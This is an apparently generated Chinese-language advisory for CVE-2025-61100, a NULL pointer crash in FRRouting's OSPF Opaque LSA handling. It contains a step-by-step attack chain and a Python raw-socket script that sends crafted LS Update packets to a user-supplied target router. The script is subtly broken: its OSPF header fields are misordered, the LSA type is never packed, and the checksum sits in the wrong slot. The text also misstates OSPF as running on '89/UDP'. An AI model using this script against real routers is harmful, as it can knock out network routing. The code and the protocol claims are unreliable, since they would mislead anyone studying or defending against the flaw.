CVE-2025-61100 FRRouting ospf_opaque_lsa_dump空指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-61100

漏洞类型

NULL指针解引用/拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FRRouting/frr

漏洞概述

CVE-2025-61100是FRRouting项目中一个高危安全漏洞，影响范围覆盖从v2.0到v10.4.1的所有版本。FRRouting是一个开源的IP路由协议套件，广泛应用于企业网络、ISP基础设施以及各种网络设备中，支持OSPF、BGP、RIP等多种路由协议。该漏洞存在于ospf_opaque.c文件的ospf_opaque_lsa_dump函数中，攻击者可以通过发送特制的畸形OSPF Opaque LSA（Link State Advertisement）数据包来触发NULL指针解引用。当FRRouting处理这些恶意构造的LSA时，ospf_opaque_lsa_dump函数在访问未正确初始化的指针时会导致程序崩溃，从而造成拒绝服务（DoS）攻击。此漏洞无需认证即可利用，攻击者只需能够与目标设备的OSPF协议端口通信即可发动攻击。由于OSPF是内部网络常用的路由协议，攻击者可能通过横向移动或利用网络设备进行攻击。该漏洞的CVSS评分达到7.5分，属于高危级别，对网络基础设施的可用性构成严重威胁。

技术细节

该漏洞的根本原因在于FRRouting的ospf_opaque_lsa_dump函数在处理OSPF Opaque LSA时缺乏充分的空指针检查。OSPF Opaque LSA是OSPF协议的扩展，用于承载额外的拓扑信息或TE（Traffic Engineering）信息。当FRRouting接收到畸形或恶意构造的Opaque LSA时，ospf_opaque_lsa_dump函数会尝试访问LSA头部的特定字段，但这些字段可能未正确初始化或被设置为NULL值。攻击者可以构造一个特殊的Opaque LSA数据包，其中包含触发NULL指针解引用的特定字段值。当程序执行到ospf_opaque_lsa_dump函数时，会尝试解引用这个NULL指针，导致程序崩溃或产生未定义行为。由于OSPF协议运行在网络层，攻击者只需能够发送IP数据包到目标设备的OSPF端口（通常为89端口），无需任何认证凭证即可触发此漏洞。此漏洞影响所有启用OSPF协议且支持Opaque LSA功能的FRRouting实例。攻击成功的后果是FRRouting进程终止，路由功能中断，可能导致网络路由收敛失败和通信中断。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别网络中运行FRRouting的设备，确认其IP地址和OSPF配置。攻击者使用网络扫描工具发现启用OSPF协议（端口89）的设备。

STEP 2

步骤2: 构造恶意数据包

攻击者构造特制的OSPF Opaque LSA数据包，在LSA的特定字段中植入触发NULL指针解引用的值。该畸形LSA会被发送到目标FRRouting设备的OSPF端口。

STEP 3

步骤3: 发送攻击载荷

通过原始套接字发送恶意构造的Opaque LSA数据包到目标设备。攻击者伪装成OSPF邻居路由器或利用多播地址（224.0.0.5）发送LSA更新。

STEP 4

步骤4: 触发漏洞

FRRouting接收到畸形LSA后，ospf_opaque_lsa_dump函数尝试处理该LSA。当函数访问未正确初始化的指针字段时，发生NULL指针解引用。

STEP 5

步骤5: 拒绝服务

NULL指针解引用导致FRRouting进程崩溃或进入异常状态，路由协议功能中断。网络中的其他路由器无法获得正确的路由信息，导致网络连接中断或路由收敛失败。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-61100 PoC - FRRouting ospf_opaque_lsa_dump NULL Pointer Dereference
This PoC demonstrates triggering a NULL pointer dereference in FRRouting's
ospf_opaque_lsa_dump function via malformed OSPF Opaque LSA.

NOTE: This is for educational and authorized testing purposes only.
"""

import socket
import struct
import random

def calculate_ospf_csum(data):
    """Calculate OSPF checksum"""
    if len(data) % 2 == 1:
        data += b'\x00'
    total = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xffff)
    total += (total >> 16)
    return ~total & 0xffff

def build_ospf_header(ospf_type, router_id, area_id, auth_type=0, auth_data=0):
    """Build OSPF header"""
    version = 2  # OSPF v2
    header = struct.pack('!BBHHII', version, ospf_type, 0, 0, router_id, area_id)
    # Add authentication
    header += struct.pack('!II', auth_type, auth_data)
    return header

def build_opaque_lsa(type_num, id_num, adv_router, seq_num, lsa_data):
    """Build malformed OSPF Opaque LSA to trigger NULL pointer dereference"""
    age = 1
    options = 0
    # LSA type 9/10/11 for Opaque LSA
    lsa_type = type_num  # 9=Link Local, 10=Area Local, 11=AS Wide
    lsa_id = id_num
    adv_router = adv_router
    seq_num = seq_num
    
    # Build LSA header minus checksum and length
    lsa_header = struct.pack('!HHI', age, options, seq_num)
    lsa_header += struct.pack('!III', lsa_id, adv_router, adv_router)
    
    # Malformed LSA body - triggering NULL pointer in ospf_opaque_lsa_dump
    # The vulnerability occurs when processing specific field values
    lsa_body = lsa_data
    
    full_lsa = lsa_header + lsa_body
    
    # Calculate checksum and length
    checksum = calculate_ospf_csum(full_lsa)
    length = len(full_lsa) + 2  # Include age
    
    # Rebuild with correct checksum
    lsa_header = struct.pack('!HHI', age, options, seq_num)
    lsa_header += struct.pack('!III', lsa_id, adv_router, adv_router)
    
    # Update length and checksum in header
    lsa_header = struct.pack('!HHI', age, checksum, seq_num)
    
    return struct.pack('!H', length) + lsa_header + lsa_body

def send_malformed_opaque_lsa(target_ip, router_id, area_id, opaque_type=10):
    """
    Send malformed OSPF Opaque LSA to trigger CVE-2025-61100
    
    Args:
        target_ip: Target FRRouting router IP
        router_id: Attacker router ID
        area_id: OSPF area ID
        opaque_type: Opaque LSA type (9, 10, or 11)
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_OSPF)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    
    # Build OSPF Header (type=4 for LSA Update)
    ospf_header = build_ospf_header(4, router_id, area_id)
    
    # Number of LSAs
    num_lsas = 1
    
    # Malformed Opaque LSA data
    # This specific构造 triggers NULL pointer in ospf_opaque_lsa_dump
    lsa_data = bytes([0x00] * 32)  # Malformed data
    
    opaque_lsa = build_opaque_lsa(
        opaque_type,  # Opaque LSA type
        random.randint(1, 0xFFFFFFFF),  # LSA ID
        router_id,  # Advertising router
        0x80000001,  # Sequence number
        lsa_data
    )
    
    # Build LSU payload
    lsu_payload = struct.pack('!I', num_lsas) + opaque_lsa
    
    # Complete OSPF packet
    ospf_packet = ospf_header + lsu_payload
    
    # Set length in OSPF header
    length = len(ospf_packet)
    ospf_packet = ospf_packet[:2] + struct.pack('!H', length) + ospf_packet[4:]
    
    # Send packet
    sock.sendto(ospf_packet, (target_ip, 0))
    sock.close()
    print(f"[+] Malformed Opaque LSA sent to {target_ip}")
    print(f"[+] Opaque Type: {opaque_type}, LSA ID: {hex(random.randint(1, 0xFFFFFFFF))}")

def main():
    """Main function"""
    target_ip = input("Enter target IP: ")
    router_id = random.randint(1, 0xFFFFFFFF)
    area_id = 0xC0A80001  # 192.168.0.1 in decimal
    
    print(f"[*] CVE-2025-61100 PoC - FRRouting NULL Pointer Dereference")
    print(f"[*] Target: {target_ip}")
    
    # Send multiple Opaque LSA types
    for opaque_type in [9, 10, 11]:
        try:
            send_malformed_opaque_lsa(target_ip, router_id, area_id, opaque_type)
        except Exception as e:
            print(f"[-] Error sending type {opaque_type}: {e}")

if __name__ == "__main__":
    main()

影响范围

FRRouting/frr < 10.4.2

FRRouting/frr v2.0 - v10.4.1

防御指南

临时缓解措施

在厂商发布正式修复版本之前，可采取以下临时缓解措施：1）通过网络隔离限制对运行FRRouting设备的OSPF端口（89/UDP）的访问，只允许必要的路由器通信；2）启用OSPF区域认证或接口认证，防止攻击者伪装成合法OSPF邻居发送恶意数据包；3）监控网络中的OSPF LSA变化，检测异常的Opaque LSA流量；4）如果业务允许，可考虑暂时禁用OSPF协议的Opaque LSA功能以降低攻击面；5）部署入侵检测系统（IDS）监控OSPF协议流量，识别潜在的CVE-2025-61100攻击尝试。